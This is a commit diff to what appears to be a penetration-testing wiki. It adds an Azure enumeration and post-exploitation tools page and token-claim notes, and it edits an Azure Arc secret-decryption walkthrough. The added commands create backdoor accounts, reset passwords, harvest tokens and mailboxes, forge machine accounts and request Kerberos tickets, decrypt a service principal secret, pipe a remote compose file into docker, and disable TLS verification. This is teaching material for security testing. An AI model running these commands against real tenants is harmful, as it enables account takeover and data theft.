HackTricks-wiki
diff --git a/‎src/SUMMARY.md‎
Lines changed: 2 additions & 1 deletion b/‎src/SUMMARY.md‎
Lines changed: 2 additions & 1 deletion
diff --git a/‎src/images/arte.png‎
2.41 MB b/‎src/images/arte.png‎
2.41 MB
diff --git a/‎src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md‎
Lines changed: 1 addition & 1 deletion b/‎src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md‎
Lines changed: 1 addition & 1 deletion b/‎src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎src/pentesting-cloud/azure-security/README.md‎
Lines changed: 96 additions & 277 deletions b/‎src/pentesting-cloud/azure-security/README.md‎
Lines changed: 96 additions & 277 deletions
diff --git a/‎src/pentesting-cloud/azure-security/az-basic-information/README.md‎
Lines changed: 1 addition & 1 deletion b/‎src/pentesting-cloud/azure-security/az-basic-information/README.md‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md‎
Lines changed: 14 additions & 0 deletions b/‎src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md‎
Lines changed: 14 additions & 0 deletions
diff --git a/‎src/pentesting-cloud/azure-security/az-enumeration-tools.md‎
Lines changed: 281 additions & 0 deletions b/‎src/pentesting-cloud/azure-security/az-enumeration-tools.md‎
Lines changed: 281 additions & 0 deletions
diff --git a/‎src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md‎
Lines changed: 5 additions & 5 deletions b/‎src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md‎
Lines changed: 5 additions & 5 deletions
@@ -398,7 +398,8 @@
   - [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md)
   - [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md)
     - [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md)
-    - [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md)
+    - [Az - Storage Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.md)
+    - [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.md)
     - [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
     - [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
   - [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
 
@@ -48,7 +48,7 @@ optional arguments:
 
 <summary>Code to perform Role Juggling from PowerShell</summary>
 
-```powershell
+```bash
 # PowerShell script to check for role juggling possibilities using AWS CLI
 
 # Check for AWS CLI installation
 
@@ -88,7 +88,7 @@ For more information check https://github.com/padok-team/cognito-scanner
 The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable).
 
 > [!TIP]
-> The **IAM Cognito unathenticated role created via is called** by default `Cognito_<Identity Pool name>Unauth_Role`
+> The **IAM Cognito unauthenticated role created via is called** by default `Cognito_<Identity Pool name>Unauth_Role`
 
 If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with:
 
 
@@ -32,7 +32,7 @@
 
 All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted.
 
-<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1</a></p></figcaption></figure>
+<figure><img src="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1</a></p></figcaption></figure>
 
 ### Azure Resource IDs
 
 
@@ -146,6 +146,19 @@ new_azure_cli_bearer_tokens_for_graph_api = (
 pprint(new_azure_cli_bearer_tokens_for_graph_api)
 ```
 
+### Other access token fields
+
+- **appid**: Application ID used to generate the token
+- **appidacr**: The Application Authentication Context Class Reference indicates how the client was authenticated, for a public client the value is 0, and if a client secret is used the value is 1
+- **acr**: The Authentication Context Class Reference claim is "0" when the end-user authentication did not meet the requirements of ISO/IEC 29115.
+- **amr**: The Authentication method indicates how the token was authenticated. A value of “pwd” indicates that a password was used.
+- **groups**: Indicates the groups where the principal is a member.
+- **iss**: The issues identifies the security token service (STS) that generated the token. e.g. https://sts.windows.net/fdd066e1-ee37-49bc-b08f-d0e152119b04/ (the uuid is the tenant ID)
+- **oid**: The object ID of the principal
+- **tid**: Tenant ID
+- **iat, nbf, exp**: Issued at (when it was issued), Not before (cannot be used before this time, usually same value as iat), Expiration time.
+
+
 ## FOCI Tokens Privilege Escalation
 
 Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended.
@@ -198,6 +211,7 @@ pprint(microsoft_office_bearer_tokens_for_graph_api)
 ## References
 
 - [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research)
+- [https://github.com/Huachao/azure-content/blob/master/articles/active-directory/active-directory-token-and-claims.md](https://github.com/Huachao/azure-content/blob/master/articles/active-directory/active-directory-token-and-claims.md)
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 
@@ -93,6 +93,23 @@ export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
 
 {{#endtab }}
 
+{{#tab name="CMD" }}
+
+```bash
+set ADAL_PYTHON_SSL_NO_VERIFY=1
+set AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
+set HTTPS_PROXY="http://127.0.0.1:8080"
+set HTTP_PROXY="http://127.0.0.1:8080"
+
+# If this is not enough
+# Download the certificate from Burp and convert it into .pem format
+# And export the following env variable
+openssl x509 -in cacert.der -inform DER -out cacert.pem -outform PEM
+set REQUESTS_CA_BUNDLE=C:\Users\user\Downloads\cacert.pem
+```
+
+{{#endtab }}
+
 {{#tab name="PS" }}
 
 ```bash
@@ -148,5 +165,269 @@ The Azure Active Directory (AD) module, now **deprecated**, is part of Azure Pow
 
 Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD).
 
+
+## Automated Recon & Compliance Tools
+
+### [turbot azure plugins](https://github.com/orgs/turbot/repositories?q=mod-azure)
+
+Turbot with steampipe and powerpipe allows to gather information from Azure and Entra ID and perform compliance checks and find misconfigurations. The currently most recommended Azure modules to run are:
+
+- [https://github.com/turbot/steampipe-mod-azure-compliance](https://github.com/turbot/steampipe-mod-azure-compliance)
+- [https://github.com/turbot/steampipe-mod-azure-insights](https://github.com/turbot/steampipe-mod-azure-insights)
+- [https://github.com/turbot/steampipe-mod-azuread-insights](https://github.com/turbot/steampipe-mod-azuread-insights)
+
+```bash
+# Install
+brew install turbot/tap/powerpipe
+brew install turbot/tap/steampipe
+steampipe plugin install azure
+steampipe plugin install azuread
+
+# Config creds via env vars or az cli default creds will be used
+export AZURE_ENVIRONMENT="AZUREPUBLICCLOUD"
+export AZURE_TENANT_ID="<tenant-id>"
+export AZURE_SUBSCRIPTION_ID="<subscription-id>"
+export AZURE_CLIENT_ID="<client-id>"
+export AZURE_CLIENT_SECRET="<secret>"
+
+# Run steampipe-mod-azure-insights
+cd /tmp
+mkdir dashboards
+cd dashboards
+powerpipe mod init
+powerpipe mod install github.com/turbot/steampipe-mod-azure-insights
+steampipe service start
+powerpipe server
+# Go to http://localhost:9033 in a browser
+```
+
+### [Prowler](https://github.com/prowler-cloud/prowler)
+
+Prowler is an Open Source security tool to perform AWS, Azure, Google Cloud and Kubernetes security best practices assessments, audits, incident response, continuous monitoring, hardening  and forensics readiness.
+
+It basically would allow us to run hundreds of checks against an Azure environment to find security misconfigurations and gather the results in json (and other text format) or check them in the web.
+
+```bash
+# Create a application with Reader role and set the tenant ID, client ID and secret in prowler so it access the app
+
+# Launch web with docker-compose
+export DOCKER_DEFAULT_PLATFORM=linux/amd64
+curl -LO https://raw.githubusercontent.com/prowler-cloud/prowler/refs/heads/master/docker-compose.yml
+curl -LO https://raw.githubusercontent.com/prowler-cloud/prowler/refs/heads/master/.env
+## If using an old docker-compose version, change the "env_file" params to: env_file: ".env"
+docker compose up -d
+# Access the web and configure the access to run a scan from it
+
+# Prowler cli
+python3 -m pip install prowler --break-system-packages
+docker run --rm toniblyx/prowler:v4-latest azure --list-checks
+docker run --rm toniblyx/prowler:v4-latest azure --list-services
+docker run --rm toniblyx/prowler:v4-latest azure --list-compliance
+docker run --rm -e "AZURE_CLIENT_ID=<client-id>" -e "AZURE_TENANT_ID=<tenant-id>" -e "AZURE_CLIENT_SECRET=<secret>" toniblyx/prowler:v4-latest azure --sp-env-auth
+## It also support other authentication types, check: prowler azure --help
+```
+
+### [Monkey365](https://github.com/silverhack/monkey365)
+
+It allows to perform Azure subscriptions and Microsoft Entra ID security configuration reviews automatically.
+
+The HTML reports are stored inside the `./monkey-reports` directory inside the github repository folder.
+
+```bash
+git clone https://github.com/silverhack/monkey365
+Get-ChildItem -Recurse monkey365 | Unblock-File
+cd monkey365
+Import-Module ./monkey365
+mkdir /tmp/monkey365-scan
+cd /tmp/monkey365-scan
+
+Get-Help Invoke-Monkey365
+Get-Help Invoke-Monkey365 -Detailed
+
+# Scan with user creds (browser will be run)
+Invoke-Monkey365 -TenantId <tenant-id> -Instance Azure -Collect All -ExportTo HTML              
+
+# Scan with App creds
+$SecureClientSecret = ConvertTo-SecureString "<secret>" -AsPlainText -Force     
+Invoke-Monkey365 -TenantId <tenant-id> -ClientId <client-id> -ClientSecret $SecureClientSecret -Instance Azure -Collect All -ExportTo HTML              
+```
+
+### [ScoutSuite](https://github.com/nccgroup/ScoutSuite)
+
+Scout Suite gathers configuration data for manual inspection and highlights risk areas. It's a multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
+
+```bash
+virtualenv -p python3 venv
+source venv/bin/activate
+pip install scoutsuite
+scout --help
+
+# Use --cli flag to use az cli credentials
+# Use --user-account to have scout prompt for user credentials
+# Use --user-account-browser to launch a browser to login
+# Use --service-principal to have scout prompt for app credentials
+
+python scout.py azure --cli
+```
+
+
+### [Azure-MG-Sub-Governance-Reporting](https://github.com/JulianHayward/Azure-MG-Sub-Governance-Reporting)
+
+It's a powershell script that helps you to **visualize all the resources and permissions inside a Management Group and the Entra ID** tenant and find security misconfigurations.
+
+It works using the Az PowerShell module, so any authentication supported by this tool is supported by the tool.
+
+```bash
+import-module Az
+.\AzGovVizParallel.ps1 -ManagementGroupId <management-group-id> [-SubscriptionIdWhitelist <subscription-id>] 
+```
+
+
+## Automated Post-Exploitation tools
+
+### [**ROADRecon**](https://github.com/dirkjanm/ROADtools)
+
+The enumeration of ROADRecon offers information about the configuration of Entra ID, like users, groups, roles, conditional access policies...
+
+```bash
+cd ROADTools
+pipenv shell
+# Login with user creds
+roadrecon auth -u [email protected] -p "Welcome2022!"
+# Login with app creds
+roadrecon auth --as-app --client "<client-id>" --password "<secret>" --tenant "<tenant-id>"
+roadrecon gather
+roadrecon gui
+```
+
+### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound)
+
+```bash
+# Launch AzureHound
+## Login with app secret
+azurehound -a "<client-id>" -s "<secret>" --tenant "<tenant-id>" list -o ./output.json
+## Login with user creds
+azurehound -u "<user-email>" -p "<password>" --tenant "<tenant-id>" list -o ./output.json
+```
+
+Launch the **BloodHound** web with **`curl -L https://ghst.ly/getbhce | docker compose -f - up`** and import the `output.json` file.
+
+Then, in the **EXPLORE** tab, in the **CYPHER** section you can see a **folder** icon that contains pre-built queries.
+
+### [**MicroBurst**](https://github.com/NetSPI/MicroBurst)
+
+MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping. It is intended to be used during penetration tests where Azure is in use.
+
+```bash
+Import-Module .\MicroBurst.psm1
+Import-Module .\Get-AzureDomainInfo.ps1
+Get-AzureDomainInfo -folder MicroBurst -Verbose
+```
+
+### [**PowerZure**](https://github.com/hausec/PowerZure)
+
+PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, EntraID, and the associated resources.
+
+It uses the **Az PowerShell** module, so any authentication supported by this tool is supported by the tool.
+
+```bash
+# Login
+Import-Module Az
+Connect-AzAccount
+
+# Clone and import PowerZure
+git clone https://github.com/hausec/PowerZure
+cd PowerZure
+ipmo ./Powerzure.psd1
+Invoke-Powerzure -h # Check all the options
+
+# Info Gathering (read)
+Get-AzureCurrentUser # Get current user
+Get-AzureTarget # What can you access to
+Get-AzureUser -All # Get all users
+Get-AzureSQLDB -All # Get all SQL DBs
+Get-AzureAppOwner # Owners of apps in Entra
+Show-AzureStorageContent -All # List containers, shared and tables
+Show-AzureKeyVaultContent -All # List all contents in key vaults
+
+
+# Operational (write)
+Set-AzureUserPassword -Password <password> -Username <username> # Change password
+Set-AzureElevatedPrivileges # Get permissions from Global Administrator in EntraID to User Access Administrator in Azure RBAC.
+New-AzureBackdoor -Username <username> -Password <password>
+Invoke-AzureRunCommand -Command <command> -VMName <vmname>
+[...]
+```
+
+### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner)
+
+GraphRunner is a post-exploitation toolset for interacting with the Microsoft Graph API. It provides various tools for performing reconnaissance, persistence, and pillaging of data from a Microsoft Entra ID (Azure AD) account.
+
+```bash
+#A good place to start is to authenticate with the Get-GraphTokens module. This module will launch a device-code login, allowing you to authenticate the session from a browser session. Access and refresh tokens will be written to the global $tokens variable. To use them with other GraphRunner modules use the Tokens flag (Example. Invoke-DumpApps -Tokens $tokens)
+Import-Module .\GraphRunner.ps1
+Get-GraphTokens
+
+#This module gathers information about the tenant including the primary contact info, directory sync settings, and user settings such as if users have the ability to create apps, create groups, or consent to apps.
+Invoke-GraphRecon -Tokens $tokens -PermissionEnum
+
+#A module to dump conditional access policies from a tenant.
+Invoke-GraphRecon -Tokens $tokens -PermissionEnum
+
+#A module to dump conditional access policies from a tenant.
+Invoke-DumpCAPS -Tokens $tokens -ResolveGuids
+
+#This module helps identify malicious app registrations. It will dump a list of Azure app registrations from the tenant including permission scopes and users that have consented to the apps. Additionally, it will list external apps that are not owned by the current tenant or by Microsoft's main app tenant. This is a good way to find third-party external apps that users may have consented to.
+Invoke-DumpApps -Tokens $tokens
+
+#Gather the full list of users from the directory.
+Get-AzureADUsers -Tokens $tokens -OutFile users.txt
+
+#Create a list of security groups along with their members.
+Get-SecurityGroups -AccessToken $tokens.access_token
+
+#Gets groups that may be able to be modified by the current user
+Get-UpdatableGroups -Tokens $tokens
+
+#Finds dynamic groups and displays membership rules
+Get-DynamicGroups -Tokens $tokens
+
+#Gets a list of SharePoint site URLs visible to the current user
+Get-SharePointSiteURLs -Tokens $tokens
+
+#This module attempts to locate mailboxes in a tenant that have allowed other users to read them. By providing a userlist the module will attempt to access the inbox of each user and display if it was successful. The access token needs to be scoped to Mail.Read.Shared or Mail.ReadWrite.Shared for this to work.
+Invoke-GraphOpenInboxFinder -Tokens $tokens -Userlist users.txt
+
+#This module attempts to gather a tenant ID associated with a domain.
+Get-TenantID -Domain
+
+#Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams.
+Invoke-GraphRunner -Tokens $tokens
+```
+
+### [Stormspotter](https://github.com/Azure/Stormspotter)
+
+Stormspotter creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.
+
+**Unfortunately, it looks unmantained**.
+
+```bash
+# Start Backend
+cd stormspotter\backend\
+pipenv shell
+python ssbackend.pyz
+
+# Start Front-end
+cd stormspotter\frontend\dist\spa\
+quasar.cmd serve -p 9091 --history
+
+# Run Stormcollector
+cd stormspotter\stormcollector\
+pipenv shell
+az login -u [email protected] -p Welcome2022!
+python stormspotter\stormcollector\sscollector.pyz cli
+# This will generate a .zip file to upload in the frontend (127.0.0.1:9091)
+```
+
 {{#include ../../banners/hacktricks-training.md}}
 
@@ -15,7 +15,7 @@ When running this script, sys admins need to provide two main parameters: **Serv
 
 An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments.
 
-```powershell
+```bash
 # Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups
 $DomainComputersSID = "SID=" + $DomainComputersSID
 $DomainControllersSID = "SID=" + $DomainControllersSID
@@ -34,24 +34,24 @@ We have the follow conditions:
 
 There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations.
 
-```powershell
+```bash
 Import-MKodule powermad
 New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
 ```
 
 Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe.
 
-```powershell
+```bash
 runas /user:fake01$ /netonly powershell
 ```
 
-```powershell
+```bash
 .\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr
 ```
 
 By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret.
 
-```powershell
+```bash
 Import-Module .\AzureArcDeployment.psm1
 
 $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedServicePrincipalSecret"